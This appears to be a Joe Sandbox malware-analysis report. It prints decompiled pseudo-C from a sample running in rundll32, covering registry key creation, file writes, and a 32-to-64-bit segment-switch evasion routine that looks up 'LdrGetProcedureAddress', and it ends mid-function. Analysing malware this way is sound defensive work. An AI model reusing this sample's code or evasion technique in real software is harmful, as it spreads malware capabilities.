                                                            			E0466C27A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                            				signed int _v8;
                                                            				int _v12;
                                                            				char _v16;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				void* _v40;
                                                            				signed int _t34;
                                                            				signed int _t40;
                                                            				int _t46;
                                                            				int _t53;
                                                            				void* _t55;
                                                            				int _t57;
                                                            				signed int _t63;
                                                            				int _t67;
                                                            				short* _t69;
                                                            				signed int _t70;
                                                            				short* _t71;
                                                            
                                                            				_t34 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t34 ^ _t70;
                                                            				E0465EF84(__ebx,  &_v28, __edx, _a4);
                                                            				_t57 = _a24;
                                                            				if(_t57 == 0) {
                                                            					_t53 =  *(_v24 + 8);
                                                            					_t57 = _t53;
                                                            					_a24 = _t53;
                                                            				}
                                                            				_t67 = 0;
                                                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                            				_v12 = _t40;
                                                            				if(_t40 == 0) {
                                                            					L15:
                                                            					if(_v16 != 0) {
                                                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                            					}
                                                            					return E04655AFE(_v8 ^ _t70);
                                                            				}
                                                            				_t55 = _t40 + _t40;
                                                            				_t17 = _t55 + 8; // 0x9
                                                            				asm("sbb eax, eax");
                                                            				if((_t17 & _t40) == 0) {
                                                            					_t69 = 0;
                                                            					L11:
                                                            					if(_t69 != 0) {
                                                            						E0465DEA0(_t67, _t69, _t67, _t55);
                                                            						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                            						if(_t46 != 0) {
                                                            							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                            						}
                                                            					}
                                                            					L14:
                                                            					E0465F190(_t69);
                                                            					goto L15;
                                                            				}
                                                            				_t20 = _t55 + 8; // 0x9
                                                            				asm("sbb eax, eax");
                                                            				_t48 = _t40 & _t20;
                                                            				_t21 = _t55 + 8; // 0x9
                                                            				_t63 = _t21;
                                                            				if((_t40 & _t20) > 0x400) {
                                                            					asm("sbb eax, eax");
                                                            					_t69 = E046684E7(_t63, _t48 & _t63);
                                                            					if(_t69 == 0) {
                                                            						goto L14;
                                                            					}
                                                            					 *_t69 = 0xdddd;
                                                            					L9:
                                                            					_t69 =  &(_t69[4]);
                                                            					goto L11;
                                                            				}
                                                            				asm("sbb eax, eax");
                                                            				E04671860();
                                                            				_t69 = _t71;
                                                            				if(_t69 == 0) {
                                                            					goto L14;
                                                            				}
                                                            				 *_t69 = 0xcccc;
                                                            				goto L9;
                                                            			}




















                                                            0x0466c282
                                                            0x0466c289
                                                            0x0466c295
                                                            0x0466c29a
                                                            0x0466c29f
                                                            0x0466c2a4
                                                            0x0466c2a7
                                                            0x0466c2a9
                                                            0x0466c2a9
                                                            0x0466c2ae
                                                            0x0466c2c7
                                                            0x0466c2cd
                                                            0x0466c2d2
                                                            0x0466c371
                                                            0x0466c375
                                                            0x0466c37a
                                                            0x0466c37a
                                                            0x0466c396
                                                            0x0466c396
                                                            0x0466c2d8
                                                            0x0466c2db
                                                            0x0466c2e0
                                                            0x0466c2e4
                                                            0x0466c330
                                                            0x0466c332
                                                            0x0466c334
                                                            0x0466c339
                                                            0x0466c350
                                                            0x0466c358
                                                            0x0466c368
                                                            0x0466c368
                                                            0x0466c358
                                                            0x0466c36a
                                                            0x0466c36b
                                                            0x00000000
                                                            0x0466c370
                                                            0x0466c2e6
                                                            0x0466c2eb
                                                            0x0466c2ed
                                                            0x0466c2ef
                                                            0x0466c2ef
                                                            0x0466c2f7
                                                            0x0466c314
                                                            0x0466c31e
                                                            0x0466c323
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c325
                                                            0x0466c32b
                                                            0x0466c32b
                                                            0x00000000
                                                            0x0466c32b
                                                            0x0466c2fb
                                                            0x0466c2ff
                                                            0x0466c304
                                                            0x0466c308
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c30a
                                                            0x00000000

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,0466AE40,?,00000000,00000001,00000001,?,?,00000001,0466AE40,?), ref: 0466C2C7
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0466C350
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0465FA21,?), ref: 0466C362
                                                            • __freea.LIBCMT ref: 0466C36B
                                                              • Part of subcall function 046684E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04668519
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 1420e1efffdd943b141f6ef290d640666d6f1b7b0f94b83e18f34abfebccf793
                                                            • Instruction ID: 3e3394bfa702eb203b40107253674cef7d4421b1976ea213561d8f6cef6c1965
                                                            • Opcode Fuzzy Hash: 1420e1efffdd943b141f6ef290d640666d6f1b7b0f94b83e18f34abfebccf793
                                                            • Instruction Fuzzy Hash: 6331C372A0061AABDF259F69CC44DAE7BA5EF50714F044128FC16E7250FB35ED50CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E0464D5B0(signed int __eax, void* __ebx, char** __ecx, void* __edi, void* __esi, int _a4, int _a8) {
                                                            				char* _v0;
                                                            				signed int _t15;
                                                            				short* _t16;
                                                            				signed int _t19;
                                                            				signed short _t27;
                                                            				char* _t31;
                                                            				short* _t36;
                                                            				short _t39;
                                                            				char** _t40;
                                                            				char** _t41;
                                                            				short* _t43;
                                                            				int _t44;
                                                            				char* _t48;
                                                            				int _t51;
                                                            				void* _t54;
                                                            				char** _t56;
                                                            				int _t58;
                                                            				void* _t62;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            
                                                            				_t15 = __eax;
                                                            				_t62 = _t66;
                                                            				_t36 = _a4;
                                                            				_t46 = __ecx;
                                                            				if(_t36 != 0) {
                                                            					_t16 = _t36;
                                                            					_t43 =  &(_t16[1]);
                                                            					do {
                                                            						_t39 =  *_t16;
                                                            						_t16 =  &(_t16[1]);
                                                            					} while (_t39 != 0);
                                                            					_t19 = (_t16 - _t43 >> 1) + 1;
                                                            					_a4 = _t19;
                                                            					_push(_t39);
                                                            					_t51 = _t19 * 4;
                                                            					_t40 = __ecx;
                                                            					_t44 = _t51;
                                                            					_push( &(__ecx[1]));
                                                            					L12();
                                                            					_t67 = _t66 + 8;
                                                            					_t15 = WideCharToMultiByte(_a8, 0, _t36, _a4,  *__ecx, _t51, 0, 0);
                                                            					asm("sbb esi, esi");
                                                            					_t54 =  ~_t15 + 1;
                                                            					if(_t54 != 0) {
                                                            						_t15 = GetLastError();
                                                            						if(_t15 == 0x7a) {
                                                            							_t58 = WideCharToMultiByte(_a8, 0, _t36, _a4, 0, 0, 0, 0);
                                                            							_push(_t40);
                                                            							_push( &(_t46[1]));
                                                            							_t44 = _t58;
                                                            							L12();
                                                            							_t67 = _t67 + 8;
                                                            							_t15 = WideCharToMultiByte(_a8, 0, _t36, _a4,  *_t46, _t58, 0, 0);
                                                            							asm("sbb esi, esi");
                                                            							_t54 =  ~_t15 + 1;
                                                            						}
                                                            					}
                                                            					_pop(_t55);
                                                            					if(_t54 == 0) {
                                                            						goto L2;
                                                            					} else {
                                                            						_t21 =  *_t46;
                                                            						_t41 =  &(_t46[1]);
                                                            						if( *_t46 != _t41) {
                                                            							L0465ED17(_t21);
                                                            							_t67 = _t67 + 4;
                                                            						}
                                                            						L32();
                                                            						asm("int3");
                                                            						_push(_t62);
                                                            						_t56 = _t41;
                                                            						_push(_t46);
                                                            						if(_t56 == 0) {
                                                            							_push(0x80070057);
                                                            							E04637AC0();
                                                            							goto L28;
                                                            						} else {
                                                            							if(_t44 < 0) {
                                                            								L28:
                                                            								_push(0x80070057);
                                                            								E04637AC0();
                                                            								goto L29;
                                                            							} else {
                                                            								_t48 = _v0;
                                                            								if(_t48 == 0) {
                                                            									L29:
                                                            									_push(0x80070057);
                                                            									E04637AC0();
                                                            									goto L30;
                                                            								} else {
                                                            									_t31 =  *_t56;
                                                            									if(_t31 == _t48) {
                                                            										if(_t44 <= 0x80) {
                                                            											goto L20;
                                                            										} else {
                                                            											_push(1);
                                                            											_push(_t44);
                                                            											_t31 = E0466718E(_t41);
                                                            											goto L25;
                                                            										}
                                                            										goto L21;
                                                            									} else {
                                                            										if(_t44 <= 0x80) {
                                                            											_t31 = L0465ED17(_t31);
                                                            											L20:
                                                            											 *_t56 = _t48;
                                                            											goto L21;
                                                            										} else {
                                                            											_push(1);
                                                            											_push(_t44);
                                                            											_t31 = E04661785(_t31);
                                                            											if(_t31 != 0) {
                                                            												L25:
                                                            												 *_t56 = _t31;
                                                            												L21:
                                                            												if( *_t56 != 0) {
                                                            													return _t31;
                                                            												} else {
                                                            													goto L31;
                                                            												}
                                                            											} else {
                                                            												L30:
                                                            												_push(0x8007000e);
                                                            												E04637AC0();
                                                            												L31:
                                                            												_push(0x8007000e);
                                                            												E04637AC0();
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												_t27 = GetLastError();
                                                            												if(_t27 > 0) {
                                                            													_t27 = _t27 & 0x0000ffff | 0x80070000;
                                                            												}
                                                            												_push(_t27);
                                                            												E04637AC0();
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												return 0x4687b60;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					 *__ecx = _t36;
                                                            					L2:
                                                            					return _t15;
                                                            				}
                                                            			}























                                                            0x0464d5b0
                                                            0x0464d5b1
                                                            0x0464d5b4
                                                            0x0464d5b8
                                                            0x0464d5bc
                                                            0x0464d5c6
                                                            0x0464d5c8
                                                            0x0464d5d0
                                                            0x0464d5d0
                                                            0x0464d5d3
                                                            0x0464d5d6
                                                            0x0464d5df
                                                            0x0464d5e1
                                                            0x0464d5e4
                                                            0x0464d5e5
                                                            0x0464d5ec
                                                            0x0464d5f1
                                                            0x0464d5f3
                                                            0x0464d5f4
                                                            0x0464d5f9
                                                            0x0464d60c
                                                            0x0464d616
                                                            0x0464d618
                                                            0x0464d61b
                                                            0x0464d61d
                                                            0x0464d626
                                                            0x0464d63f
                                                            0x0464d644
                                                            0x0464d645
                                                            0x0464d646
                                                            0x0464d64a
                                                            0x0464d64f
                                                            0x0464d662
                                                            0x0464d66c
                                                            0x0464d66e
                                                            0x0464d66e
                                                            0x0464d626
                                                            0x0464d671
                                                            0x0464d672
                                                            0x00000000
                                                            0x0464d678
                                                            0x0464d678
                                                            0x0464d67a
                                                            0x0464d67f
                                                            0x0464d682
                                                            0x0464d687
                                                            0x0464d687
                                                            0x0464d68a
                                                            0x0464d68f
                                                            0x0464d690
                                                            0x0464d694
                                                            0x0464d696
                                                            0x0464d699
                                                            0x0464d6f3
                                                            0x0464d6f8
                                                            0x00000000
                                                            0x0464d69b
                                                            0x0464d69d
                                                            0x0464d6fd
                                                            0x0464d6fd
                                                            0x0464d702
                                                            0x00000000
                                                            0x0464d69f
                                                            0x0464d69f
                                                            0x0464d6a4
                                                            0x0464d707
                                                            0x0464d707
                                                            0x0464d70c
                                                            0x00000000
                                                            0x0464d6a6
                                                            0x0464d6a6
                                                            0x0464d6aa
                                                            0x0464d6e0
                                                            0x00000000
                                                            0x0464d6e2
                                                            0x0464d6e2
                                                            0x0464d6e4
                                                            0x0464d6e5
                                                            0x00000000
                                                            0x0464d6ea
                                                            0x00000000
                                                            0x0464d6ac
                                                            0x0464d6b2
                                                            0x0464d6c7
                                                            0x0464d6cf
                                                            0x0464d6cf
                                                            0x00000000
                                                            0x0464d6b4
                                                            0x0464d6b4
                                                            0x0464d6b6
                                                            0x0464d6b8
                                                            0x0464d6c2
                                                            0x0464d6ed
                                                            0x0464d6ed
                                                            0x0464d6d1
                                                            0x0464d6d6
                                                            0x0464d6f2
                                                            0x0464d6d8
                                                            0x00000000
                                                            0x0464d6d8
                                                            0x0464d6c4
                                                            0x0464d711
                                                            0x0464d711
                                                            0x0464d716
                                                            0x0464d71b
                                                            0x0464d71b
                                                            0x0464d720
                                                            0x0464d725
                                                            0x0464d726
                                                            0x0464d727
                                                            0x0464d728
                                                            0x0464d729
                                                            0x0464d72a
                                                            0x0464d72b
                                                            0x0464d72c
                                                            0x0464d72d
                                                            0x0464d72e
                                                            0x0464d72f
                                                            0x0464d730
                                                            0x0464d738
                                                            0x0464d73d
                                                            0x0464d73d
                                                            0x0464d742
                                                            0x0464d743
                                                            0x0464d748
                                                            0x0464d749
                                                            0x0464d74a
                                                            0x0464d74b
                                                            0x0464d74c
                                                            0x0464d74d
                                                            0x0464d74e
                                                            0x0464d74f
                                                            0x0464d755
                                                            0x0464d755
                                                            0x0464d6c2
                                                            0x0464d6b2
                                                            0x0464d6aa
                                                            0x0464d6a4
                                                            0x0464d69d
                                                            0x0464d699
                                                            0x0464d5be
                                                            0x0464d5be
                                                            0x0464d5c0
                                                            0x0464d5c3
                                                            0x0464d5c3

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0464D60C
                                                            • GetLastError.KERNEL32(?,00000000,00000000), ref: 0464D61D
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0464D639
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464D662
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            • Opcode ID: a68b12516e1caf5dc784f78550b00a930eb7dcf2aa7e3327686dec3e9a3d80c0
                                                            • Instruction ID: 0017451d2200df9b143920cfc6b3d9942a77b7fb6d955951d693907617299e56
                                                            • Opcode Fuzzy Hash: a68b12516e1caf5dc784f78550b00a930eb7dcf2aa7e3327686dec3e9a3d80c0
                                                            • Instruction Fuzzy Hash: 6A21E272A00211BBEF240F54DC45FAA7B69EF44B54F248215FD099B290FB71BD20CA94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E046410F0(intOrPtr __ecx, intOrPtr* _a4, void* _a8) {
                                                            				long _v8;
                                                            				intOrPtr _v12;
                                                            				int _v16;
                                                            				void** _v20;
                                                            				char _v24;
                                                            				char _t26;
                                                            				void* _t28;
                                                            				long _t29;
                                                            				void* _t37;
                                                            				void* _t42;
                                                            				void* _t43;
                                                            				char* _t45;
                                                            				void** _t49;
                                                            				void* _t51;
                                                            				intOrPtr _t52;
                                                            				short* _t53;
                                                            
                                                            				_t42 = _a8;
                                                            				_t49 = _a4 + 1;
                                                            				_v12 = __ecx;
                                                            				_v20 = _t49;
                                                            				_t26 = _t42 - 1 + _t49;
                                                            				_v16 = 0;
                                                            				_v24 = _t26;
                                                            				if(_t26 - _t49 >= 4) {
                                                            					_t51 =  *_t49;
                                                            					_v20 =  &(_t49[1]);
                                                            				} else {
                                                            					_v16 = 1;
                                                            					_t51 = 0;
                                                            				}
                                                            				_t45 =  &_v24;
                                                            				_t28 = E04640D20(_t45);
                                                            				_t53 = _t28;
                                                            				if(_v16 == 0) {
                                                            					_t29 = _t42 + 4;
                                                            					_v8 = _t29;
                                                            					_t43 = LocalAlloc(0x40, _t29);
                                                            					E0465E060(_t43, _a4, _a8);
                                                            					_a8 = 0;
                                                            					_a4 = _a8 + _t43;
                                                            					RegCreateKeyExW(_t51, _t53, 0, 0, 0, 0x104, 0,  &_a8, 0);
                                                            					asm("sbb edi, edi");
                                                            					_t37 = _a8;
                                                            					_t52 = _t51 + 1;
                                                            					if(_t37 != 0) {
                                                            						RegCloseKey(_t37);
                                                            					}
                                                            					_push(_t45);
                                                            					_push(0x3f);
                                                            					_push(_v8);
                                                            					 *_a4 = _t52;
                                                            					_push(_t43);
                                                            					E04631C60( *((intOrPtr*)(_v12 + 4)));
                                                            					_t28 = LocalFree(_t43);
                                                            					if(_t53 != 0) {
                                                            						return L04655B0F(_t53);
                                                            					}
                                                            				}
                                                            				return _t28;
                                                            			}



















                                                            0x046410fa
                                                            0x046410fd
                                                            0x04641100
                                                            0x04641106
                                                            0x04641109
                                                            0x0464110b
                                                            0x04641112
                                                            0x0464111a
                                                            0x04641127
                                                            0x0464112c
                                                            0x0464111c
                                                            0x0464111c
                                                            0x04641123
                                                            0x04641123
                                                            0x0464112f
                                                            0x04641132
                                                            0x0464113b
                                                            0x0464113d
                                                            0x04641143
                                                            0x04641149
                                                            0x04641155
                                                            0x0464115b
                                                            0x04641168
                                                            0x0464116f
                                                            0x04641187
                                                            0x0464118f
                                                            0x04641191
                                                            0x04641194
                                                            0x04641197
                                                            0x0464119a
                                                            0x0464119a
                                                            0x046411a3
                                                            0x046411a7
                                                            0x046411a9
                                                            0x046411ac
                                                            0x046411b1
                                                            0x046411b2
                                                            0x046411b8
                                                            0x046411c0
                                                            0x00000000
                                                            0x046411c8
                                                            0x046411c0
                                                            0x046411d1

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0464114C
                                                            • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04641187
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 0464119A
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 046411B8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseCreateFree
                                                            • String ID:
                                                            • API String ID: 1942913825-0
                                                            • Opcode ID: d4d4c5bf4e1bfa0fc85fa144bcb9b506c9d71a8a8a9bb6512914a15670d6f2f3
                                                            • Instruction ID: 618d6ebd35a3e6998a8ca5323776457b7f7a2708be26de7ff1adc20d98baa711
                                                            • Opcode Fuzzy Hash: d4d4c5bf4e1bfa0fc85fa144bcb9b506c9d71a8a8a9bb6512914a15670d6f2f3
                                                            • Instruction Fuzzy Hash: 3F2173B1A00208BBDF04DF65CC48FDEBBB8EF85750F108125F905AB281E775AA44CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E04635910(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                            				signed int _v8;
                                                            				intOrPtr _v15;
                                                            				long _v19;
                                                            				char _v20;
                                                            				char _v24;
                                                            				long _v28;
                                                            				long _v32;
                                                            				long _v36;
                                                            				void* _v40;
                                                            				signed int _t26;
                                                            				WCHAR* _t32;
                                                            				char* _t34;
                                                            				long _t44;
                                                            				intOrPtr* _t46;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				signed int _t57;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ _t57;
                                                            				_t54 = __ecx;
                                                            				_v32 = 0;
                                                            				_t46 = _a4;
                                                            				_t44 =  *(_t46 + 4);
                                                            				_v40 = _t46 + 8;
                                                            				_v28 =  *_t46;
                                                            				_v36 = _a8 + 0xfffffff8;
                                                            				_t32 = __ecx + 0x18;
                                                            				if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
                                                            					_t32 =  *_t32;
                                                            				}
                                                            				_t56 = CreateFileW(_t32, 0x40000000, 2, 0, 3, 0x80, 0);
                                                            				if(_t56 == 0xffffffff) {
                                                            					_push(_t46);
                                                            					_push(0x3f);
                                                            					_v24 = 0x73;
                                                            					_t34 =  &_v24;
                                                            					_push(1);
                                                            				} else {
                                                            					SetFilePointer(_t56, _t44,  &_v28, 0);
                                                            					WriteFile(_t56, _v40, _v36,  &_v32, 0);
                                                            					CloseHandle(_t56);
                                                            					_v20 = 0x71;
                                                            					_push(_t46);
                                                            					asm("adc eax, 0x0");
                                                            					_v15 = _t44 + _v32;
                                                            					_push(0x3f);
                                                            					_v19 = _v28;
                                                            					_t34 =  &_v20;
                                                            					_push(9);
                                                            				}
                                                            				E04631C60( *((intOrPtr*)(_t54 + 4)));
                                                            				return E04655AFE(_v8 ^ _t57, _t34);
                                                            			}




















                                                            0x04635916
                                                            0x0463591d
                                                            0x04635923
                                                            0x04635925
                                                            0x0463592c
                                                            0x0463592f
                                                            0x04635935
                                                            0x0463593a
                                                            0x04635947
                                                            0x0463594a
                                                            0x0463594d
                                                            0x0463594f
                                                            0x0463594f
                                                            0x0463596a
                                                            0x0463596f
                                                            0x046359ba
                                                            0x046359bb
                                                            0x046359bd
                                                            0x046359c1
                                                            0x046359c4
                                                            0x04635971
                                                            0x04635979
                                                            0x0463598c
                                                            0x04635993
                                                            0x046359a0
                                                            0x046359a7
                                                            0x046359a8
                                                            0x046359ab
                                                            0x046359ae
                                                            0x046359b0
                                                            0x046359b3
                                                            0x046359b6
                                                            0x046359b6
                                                            0x046359ca
                                                            0x046359df

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?), ref: 04635964
                                                            • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 04635979
                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0463598C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04635993
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                            • String ID:
                                                            • API String ID: 3604237281-0
                                                            • Opcode ID: be3c0c8e57212970905d7b6f09dd167bbb862cd7f012a2e80da3df576383d264
                                                            • Instruction ID: 066b2e3f3a724e405b431cc8b97bf1e316ba7e1ef1c6eee1fe48aad578309f17
                                                            • Opcode Fuzzy Hash: be3c0c8e57212970905d7b6f09dd167bbb862cd7f012a2e80da3df576383d264
                                                            • Instruction Fuzzy Hash: 31214171A00209BFEB04DFA4CC45FEEB7B8EF09725F104159E615A72C0EB75AA45CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 27%
                                                            			E046488AE() {
                                                            				signed int _t71;
                                                            
                                                            				__eax =  *(__ebp - 0x150);
                                                            				__esi = GetProcessHeap;
                                                            				__eax =  *(__ebp - 0x150) << 2;
                                                            				 *(__ebp - 0x11c) =  *(__ebp - 0x150) << 2;
                                                            				__eax =  *0x4687ae0; // 0x2aa0000
                                                            				__eflags = __eax;
                                                            				if(__eax == 0) {
                                                            					__eax = GetProcessHeap();
                                                            					 *0x4687ae0 = __eax;
                                                            				}
                                                            				__eax = RtlAllocateHeap(__eax, 0,  *(__ebp - 0x11c));
                                                            				 *(__ebp - 0x13c) = __eax;
                                                            				__eflags = __eax;
                                                            				if(__eax == 0) {
                                                            					return E04655AFE( *(_t71 - 4) ^ _t71);
                                                            				} else {
                                                            					__eax =  *(__ebp - 0x150);
                                                            					__ecx =  *(__ebp - 0x148);
                                                            					__edx =  *(__ebp - 0x150) * 4;
                                                            					__eax = 0;
                                                            					__ecx =  *(__ebp - 0x148) + __ebx;
                                                            					asm("adc eax, edi");
                                                            					__ecx =  *(__ebp - 0x13c);
                                                            					L04648310( *(__ebp - 0x13c),  *(__ebp - 0x150) * 4,  *(__ebp - 0x148) + __ebx, 0) =  *(__ebp - 0x150);
                                                            					__eax =  *(__ebp - 0x150) +  *(__ebp - 0x150);
                                                            					 *(__ebp - 0x11c) =  *(__ebp - 0x150) +  *(__ebp - 0x150);
                                                            					__eax =  *0x4687ae0; // 0x2aa0000
                                                            					__eflags = __eax;
                                                            					if(__eax == 0) {
                                                            						__eax = GetProcessHeap();
                                                            						 *0x4687ae0 = __eax;
                                                            					}
                                                            					__eax = RtlAllocateHeap(__eax, 0,  *(__ebp - 0x11c));
                                                            					 *(__ebp - 0x134) = __eax;
                                                            					__eflags = __eax;
                                                            					if(__eax != 0) {
                                                            						__eax =  *(__ebp - 0x150);
                                                            						__ecx =  *(__ebp - 0x140);
                                                            						__edx =  *(__ebp - 0x150) +  *(__ebp - 0x150);
                                                            						__eax = 0;
                                                            						__ecx =  *(__ebp - 0x140) + __ebx;
                                                            						asm("adc eax, edi");
                                                            						__ecx =  *(__ebp - 0x134);
                                                            						L04648310( *(__ebp - 0x134),  *(__ebp - 0x150) +  *(__ebp - 0x150),  *(__ebp - 0x140) + __ebx, 0) =  *(__ebp - 0x14c);
                                                            						__eax =  *(__ebp - 0x14c) << 2;
                                                            						 *(__ebp - 0x11c) =  *(__ebp - 0x14c) << 2;
                                                            						__eax =  *0x4687ae0;
                                                            						__eflags = __eax;
                                                            						if(__eax == 0) {
                                                            							__eax =  *__esi();
                                                            							 *0x4687ae0 = __eax;
                                                            						}
                                                            						__esi = __eax;
                                                            						 *(__ebp - 0x138) = __esi;
                                                            						__eflags = __esi;
                                                            						if(__esi != 0) {
                                                            							__eax =  *(__ebp - 0x14c);
                                                            							__ecx =  *(__ebp - 0x144);
                                                            							__edx =  *(__ebp - 0x14c) * 4;
                                                            							__eax = 0;
                                                            							__ecx =  *(__ebp - 0x144) + __ebx;
                                                            							asm("adc eax, edi");
                                                            							__ecx = __esi;
                                                            							__eax = L04648310(__esi,  *(__ebp - 0x14c) * 4,  *(__ebp - 0x144) + __ebx, 0);
                                                            							__esi =  *(__ebp - 0x150);
                                                            							__ecx = 0;
                                                            							 *(__ebp - 0x11c) = 0;
                                                            							__eflags = __esi;
                                                            							if(__esi == 0) {
                                                            								L30:
                                                            								asm("xorps xmm0, xmm0");
                                                            								asm("movlpd [ebp-0x120], xmm0");
                                                            							} else {
                                                            								asm("o16 nop [eax+eax]");
                                                            								do {
                                                            									__eax =  *(__ebp - 0x138);
                                                            									__edx =  *( *(__ebp - 0x138) + __ecx * 4);
                                                            									__eax = 0;
                                                            									__edx =  *( *(__ebp - 0x138) + __ecx * 4) + __ebx;
                                                            									asm("adc eax, edi");
                                                            									__eflags = __edx;
                                                            									if(__edx != 0) {
                                                            										L17:
                                                            										 *((char*)(__ebp - 0x111)) = 0;
                                                            										 *(__ebp - 0x130) = __edx;
                                                            										 *(__ebp - 0x12c) = __eax;
                                                            										_push(0x33);
                                                            										L18();
                                                            										 *__esp =  *__esp + 5;
                                                            										asm("retf");
                                                            										_push(__esi);
                                                            										__edi = "LdrGetProcedureAddress";
                                                            										__eax = __eax - 1;
                                                            										__esi =  *(__ebp - 0x130);
                                                            										__ecx = 0x17;
                                                            										0x17 = 3;
                                                            										__ecx = 0x17 >> 2;
                                                            										__eflags = 0x17 >> 2;
                                                            										asm("repe cmpsd");
                                                            										if(0x17 >> 2 == 0) {
                                                            											__eflags = 0x17;
                                                            											if(0x17 == 0) {
                                                            												L24:
                                                            												 *((char*)(__ebp - 0x111)) = 1;
                                                            											} else {
                                                            												__eflags = 0x17 - 1;
                                                            												if(0x17 == 1) {
                                                            													L23:
                                                            													asm("cmpsb");
                                                            													if(__eflags == 0) {
                                                            														goto L24;
                                                            													}
                                                            												} else {
                                                            													asm("cmpsw");
                                                            													if(0x17 == 1) {
                                                            														__eflags = 3 - 2;
                                                            														if(3 == 2) {
                                                            															goto L24;
                                                            														} else {
                                                            															goto L23;
                                                            														}
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            										_pop(__esi);
                                                            										L26();
                                                            										 *((intOrPtr*)(__esp + 4)) = 0x23;
                                                            										 *__esp =  *__esp + 0xd;
                                                            										asm("retf");
                                                            										__eflags =  *((char*)(__ebp - 0x111));
                                                            										__ecx =  *(__ebp - 0x11c);
                                                            										if( *((char*)(__ebp - 0x111)) != 0) {
                                                            											__eax =  *(__ebp - 0x134);
